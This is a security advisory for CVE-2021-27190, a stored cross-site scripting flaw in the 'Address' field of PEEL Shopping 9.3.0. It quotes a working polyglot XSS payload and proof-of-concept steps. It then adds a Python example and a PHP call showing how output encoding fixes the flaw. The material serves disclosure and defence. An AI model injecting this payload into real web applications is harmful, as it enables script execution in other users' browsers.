

CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'


Date

2021-02-11

Exploit Author

Anmol K Sachan

Vendor Homepage

https://www.peel.fr/

Software Link

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Vulnerable Software Link

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Software

PEEL SHOPPING 9.3.0

Vulnerability Type

Stored Cross-site Scripting

Vulnerability

Stored XSS

Tested on

Windows 10 (XAMPP)

CVE Assigned

CVE-2021-27190

This application is vulnerable to stored cross-site scripting (XSS).

Vulnerable script

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

Vulnerable parameter

Address

Payload used

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

PoC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
On the same page where the payload was injected, click the text box to edit the address.
The injected JavaScript (XSS) executes.
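The defensive fix for this class of bug is to HTML-encode the stored address at the point where it is written back into the edit form's value attribute, so the browser treats the text as data rather than markup. The following Python is an added example, not PEEL Shopping's own code (the application is PHP): it models the vulnerable rendering of the stored 'Address' value beside an encoded rendering, feeds both the payload quoted in this advisory, and uses the standard-library HTML parser to check whether the result is still a single input element whose decoded value is the stored text. The form field name `adresse` and the exact markup shape are assumptions; the stored string is the advisory's payload.

```python
import html
from html.parser import HTMLParser

# Constructed input for this example: the address a user submitted through the
# vulnerable change_params.php form. It is the polyglot payload quoted in the advisory.
STORED_ADDRESS = r"""jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"""

# Assumed form field name; PEEL's real field name is not given in the advisory.
FIELD_NAME = "adresse"


def render_vulnerable(address: str) -> str:
    """Interpolates the stored value verbatim into the value attribute.

    This models the failure the advisory reports: a " in the data closes the
    attribute and a < opens a new element, so stored text becomes markup."""
    return f'<input type="text" name="{FIELD_NAME}" value="{address}">'


def render_fixed(address: str) -> str:
    """Same markup, but the value is HTML-encoded for an attribute context first.

    html.escape(quote=True) replaces & < > " and ' with character references, so
    nothing in the user's data can close the attribute or start a tag; the browser
    decodes the references and shows the original text in the box."""
    return f'<input type="text" name="{FIELD_NAME}" value="{html.escape(address, quote=True)}">'


class StartTagCollector(HTMLParser):
    """Records every start tag the markup produces, with decoded attribute values."""

    def __init__(self):
        super().__init__()
        self.tags = []  # list of (tag_name, {attr: value}) in document order

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(markup: str) -> list:
    """Tokenises the markup with the standard-library parser and returns its start tags."""
    parser = StartTagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def renders_as_single_input(markup: str, expected_value: str) -> bool:
    """True when the markup is exactly one <input> whose decoded value is the stored text.

    Any extra element (the injected <svg onload=...> here) or a truncated value means
    the data escaped its attribute context."""
    tags = start_tags(markup)
    return (
        len(tags) == 1
        and tags[0][0] == "input"
        and tags[0][1].get("value") == expected_value
    )


if __name__ == "__main__":
    for label, markup in (("vulnerable", render_vulnerable(STORED_ADDRESS)),
                          ("fixed", render_fixed(STORED_ADDRESS))):
        names = [name for name, _ in start_tags(markup)]
        ok = renders_as_single_input(markup, STORED_ADDRESS)
        print(f"{label}: tags={names} single_input={ok}")
```

In PHP the equivalent call is `htmlspecialchars($address, ENT_QUOTES, 'UTF-8')` where the value is echoed into the attribute. Encoding on output rather than on input keeps the stored data intact while neutralising it in the HTML attribute and element-text contexts it is later rendered into; a value that will also be placed inside a script block needs its own JavaScript-context encoding, which this example does not cover.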

References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190
